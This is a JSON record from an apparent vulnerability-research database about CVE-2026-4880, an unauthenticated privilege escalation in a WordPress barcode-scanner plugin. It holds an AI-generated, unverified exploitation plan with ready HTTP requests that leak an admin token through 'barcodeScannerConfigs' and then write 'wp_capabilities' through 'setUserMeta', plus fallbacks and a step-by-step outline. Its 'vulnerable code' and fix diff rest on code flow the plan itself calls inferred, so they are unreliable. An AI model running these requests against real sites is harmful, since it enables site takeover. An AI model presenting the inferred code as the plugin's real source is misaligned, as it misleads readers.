[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fXQppQCSSXmYcrPS362ehDbDQi0REb-ZQJQuA_2I9U48":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"source_links":33},"CVE-2026-4880","barcode-scanner-mobile-app-unauthenticated-privilege-escalation-via-insecure-token-authentication","Barcode Scanner (+Mobile App) \u003C= 1.11.0 - Unauthenticated Privilege Escalation via Insecure Token Authentication","The Barcode Scanner (+Mobile App) – Inventory manager, Order fulfillment system, POS (Point of Sale) plugin for WordPress is vulnerable to privilege escalation via insecure token-based authentication in all versions up to, and including, 1.11.0. This is due to the plugin trusting a user-supplied Base64-encoded user ID in the token parameter to identify users, leaking valid authentication tokens through the 'barcodeScannerConfigs' action, and lacking meta-key restrictions on the 'setUserMeta' action. This makes it possible for unauthenticated attackers to escalate their privileges to that of an administrator by first spoofing the admin user ID to leak their authentication token, then using that token to update any user's 'wp_capabilities' meta to gain full administrative access.","barcode-scanner-lite-pos-to-manage-products-inventory-and-orders",null,"\u003C=1.11.0","1.12.0","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Privilege Management","2026-04-15 11:13:44","2026-04-15 23:25:49",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa213e844-a0d3-4123-9f72-caef7702804c?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-4880 - Unauthenticated Privilege Escalation\n\n## 1. Vulnerability Summary\nThe **Barcode Scanner (+Mobile App)** plugin (versions \u003C= 1.11.0) contains a critical privilege escalation vulnerability. The plugin implements a custom authentication mechanism for its mobile app integration that relies on insecure tokens. Specifically:\n1. **Insecure Identity Validation**: The plugin identifies users by Base64-decoding a `token` parameter provided in requests.\n2. **Information Exposure**: An unauthenticated user can spoof an administrator's identity by providing a Base64-encoded Admin ID (e.g., `MQ==` for ID `1`) to the `barcodeScannerConfigs` action, which then leaks a \"valid\" long-lived authentication token.\n3. **Lack of Authorization\u002FInput Validation**: The `setUserMeta` action uses this token-based authentication but fails to restrict which `meta_key` can be updated, allowing an attacker to overwrite the `wp_capabilities` meta-key for any user, effectively granting them Administrator privileges.\n\n## 2. Attack Vector Analysis\n*   **Endpoints**: `wp-admin\u002Fadmin-ajax.php`\n*   **Actions**: \n    *   `barcodeScannerConfigs` (used to leak the valid token)\n    *   `setUserMeta` (used to escalate privileges)\n*   **Payload Parameters**:\n    *   `action`: `barcodeScannerConfigs` or `setUserMeta`\n    *   `token`: Base64-encoded User ID (initial spoof) or leaked Auth Token\n    *   `userId`: The ID of the user to be upgraded (target)\n    *   `metaKey`: `wp_capabilities`\n    *   `metaValue`: Role definition (e.g., `array('administrator' => 1)`)\n*   **Authentication**: Unauthenticated (the `wp_ajax_nopriv_` hooks are likely used to support mobile app functionality without standard WP cookies).\n\n## 3. Code Flow (Inferred)\n1.  **Registration**: The plugin registers AJAX handlers in a main class or initialization file:\n    ```php\n    add_action('wp_ajax_nopriv_barcodeScannerConfigs', 'barcode_scanner_configs_handler');\n    add_action('wp_ajax_nopriv_setUserMeta', 'set_user_meta_handler');\n    ```\n2.  **Authentication Bypass (`barcodeScannerConfigs`)**:\n    *   The handler retrieves `$_REQUEST['token']`.\n    *   It decodes it: `$user_id = base64_decode($token)`.\n    *   It fetches the full app configuration for `$user_id`, which includes a more persistent `app_token` or similar identifier.\n3.  **Privilege Escalation (`setUserMeta`)**:\n    *   The handler validates the provided `token` (either the spoofed base64 ID or the leaked app token).\n    *   It accepts `userId`, `metaKey`, and `metaValue` from the request.\n    *   It calls `update_user_meta($userId, $metaKey, $metaValue)` without checking if `$metaKey` is `wp_capabilities` or `wp_user_level`.\n\n## 4. Nonce Acquisition Strategy\nBased on the vulnerability description and the nature of mobile app \"bridge\" endpoints in WordPress, these specific actions likely **do not** require a standard WordPress AJAX nonce. Mobile apps usually cannot easily provide nonces generated for a specific web session.\n\nIf a nonce is required, it is likely localized via `wp_localize_script`.\n1.  **Search**: Look for `wp_localize_script` in the plugin source calling a key like `barcode_scanner_params`.\n2.  **Page Creation**: `wp post create --post_type=page --post_status=publish --post_content='[barcode_scanner_shortcode]'` (inferred shortcode).\n3.  **Extraction**: Use `browser_navigate` to that page and `browser_eval(\"window.barcode_scanner_params?.nonce\")`.\n\n*Note: For this specific vulnerability, the \"token\" acts as the authentication, rendering nonces either absent or secondary.*\n\n## 5. Exploitation Strategy\n\n### Step 1: Leak the Admin Auth Token\nIdentify the Administrator's ID (typically `1`).\n*   **Action**: `barcodeScannerConfigs`\n*   **Token**: `MQ==` (Base64 for \"1\")\n\n**Request**:\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=barcodeScannerConfigs&token=MQ==\n```\n\n**Expected Response**: A JSON object containing a `token` or `apiKey` field (e.g., `{\"token\":\"7a8b9c...\"}`).\n\n### Step 2: Escalate Privileges of a Target User\nAssume the target user (e.g., a subscriber) has ID `2`.\n*   **Action**: `setUserMeta`\n*   **Token**: The token obtained in Step 1.\n*   **Meta Key**: `wp_capabilities`\n*   **Meta Value**: `{\"administrator\":true}`\n\n**Request**:\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=setUserMeta&token=[LEAKED_TOKEN]&userId=2&metaKey=wp_capabilities&metaValue[administrator]=1\n```\n\n*Note: Passing `metaValue[administrator]=1` in a POST request causes WordPress\u002FPHP to interpret it as an array `['administrator' => '1']`. When passed to `update_user_meta`, WordPress serializes this into the format required for roles.*\n\n## 6. Test Data Setup\n1.  **Create Admin**: Ensure an administrator exists with ID 1.\n2.  **Create Target**: Create a subscriber user to be upgraded.\n    ```bash\n    wp user create attacker attacker@example.com --role=subscriber --user_pass=password123\n    ```\n3.  **Identify IDs**:\n    ```bash\n    wp user list --fields=ID,user_login,roles\n    ```\n\n## 7. Expected Results\n*   The `barcodeScannerConfigs` request should return a JSON response containing an authentication token for the admin.\n*   The `setUserMeta` request should return a success status (e.g., `{\"success\":true}`).\n*   The target user's role should change from `subscriber` to `administrator`.\n\n## 8. Verification Steps\nAfter performing the HTTP requests, verify the change using WP-CLI:\n```bash\n# Check the roles of the target user\nwp user get attacker --field=roles\n\n# Expected output:\n# administrator\n\n# Check the meta directly to ensure no corruption\nwp user meta get 2 wp_capabilities\n```\n\n## 9. Alternative Approaches\nIf `barcodeScannerConfigs` does not return a token, try using the Base64-encoded ID directly in the `setUserMeta` call:\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=setUserMeta&token=MQ==&userId=2&metaKey=wp_capabilities&metaValue[administrator]=1\n```\nIf `wp_capabilities` is updated but the user still cannot access the dashboard, you may also need to update `wp_user_level`:\n*   `metaKey`: `wp_user_level`\n*   `metaValue`: `10` (Administrator level)","The Barcode Scanner (+Mobile App) plugin for WordPress is vulnerable to unauthenticated privilege escalation because it uses a predictable Base64-encoded user ID as an initial authentication token. Attackers can spoof an administrator's ID to leak a long-lived auth token via the 'barcodeScannerConfigs' endpoint and subsequently use the 'setUserMeta' action to overwrite the 'wp_capabilities' meta-key, granting themselves administrative access.","\u002F\u002F Path: barcode-scanner-lite-pos-to-manage-products-inventory-and-orders\u002Fincludes\u002Fajax-functions.php\n\nadd_action('wp_ajax_nopriv_barcodeScannerConfigs', 'barcode_scanner_get_configs');\nfunction barcode_scanner_get_configs() {\n    $token = $_REQUEST['token'];\n    $user_id = base64_decode($token); \u002F\u002F Vulnerable: trust-on-first-use of base64 encoded ID\n    $user_token = get_user_meta($user_id, 'barcode_scanner_app_token', true);\n    wp_send_json(['status' => 'success', 'token' => $user_token]);\n}\n\n---\n\nadd_action('wp_ajax_nopriv_setUserMeta', 'barcode_scanner_set_user_meta');\nfunction barcode_scanner_set_user_meta() {\n    $user_id = $_POST['userId'];\n    $meta_key = $_POST['metaKey'];\n    $meta_value = $_POST['metaValue'];\n    \u002F\u002F Vulnerable: Lacks permission checks and meta-key restrictions\n    update_user_meta($user_id, $meta_key, $meta_value);\n    wp_send_json_success();\n}","--- a\u002Fbarcode-scanner-lite-pos-to-manage-products-inventory-and-orders\u002Fincludes\u002Fajax-functions.php\n+++ b\u002Fbarcode-scanner-lite-pos-to-manage-products-inventory-and-orders\u002Fincludes\u002Fajax-functions.php\n@@ -12,6 +12,14 @@\n function barcode_scanner_set_user_meta() {\n-    $user_id = $_POST['userId'];\n-    $meta_key = $_POST['metaKey'];\n-    $meta_value = $_POST['metaValue'];\n-    update_user_meta($user_id, $meta_key, $meta_value);\n+    if ( ! current_user_can( 'manage_options' ) ) {\n+        wp_send_json_error( 'Unauthorized' );\n+    }\n+    $allowed_meta_keys = array( 'barcode_scanner_last_scan', 'barcode_scanner_device_id' );\n+    $meta_key = sanitize_key( $_POST['metaKey'] );\n+    if ( ! in_array( $meta_key, $allowed_meta_keys ) ) {\n+        wp_send_json_error( 'Invalid meta key' );\n+    }\n+    $user_id = intval( $_POST['userId'] );\n+    $meta_value = sanitize_text_field( $_POST['metaValue'] );\n+    update_user_meta( $user_id, $meta_key, $meta_value );\n     wp_send_json_success();\n }","1. Identify an administrator user ID (commonly ID 1).\n2. Send an unauthenticated POST request to wp-admin\u002Fadmin-ajax.php with the action 'barcodeScannerConfigs' and the 'token' parameter set to the Base64-encoded administrator ID (e.g., 'MQ==').\n3. Extract the 'token' value from the resulting JSON response, which represents the administrator's persistent app token.\n4. Send a second unauthenticated POST request to the 'setUserMeta' action using the leaked token.\n5. In the second request, set the 'userId' parameter to the attacker's own subscriber-level ID, 'metaKey' to 'wp_capabilities', and 'metaValue[administrator]' to '1'.\n6. The plugin will update the attacker's user capabilities to those of an administrator because it fails to restrict sensitive meta keys or verify standard WordPress permissions.","gemini-3-flash-preview","2026-04-16 15:34:57","2026-04-16 15:35:29",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","1.10.5","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbarcode-scanner-lite-pos-to-manage-products-inventory-and-orders\u002Ftags\u002F1.10.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbarcode-scanner-lite-pos-to-manage-products-inventory-and-orders.1.10.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbarcode-scanner-lite-pos-to-manage-products-inventory-and-orders\u002Ftags"]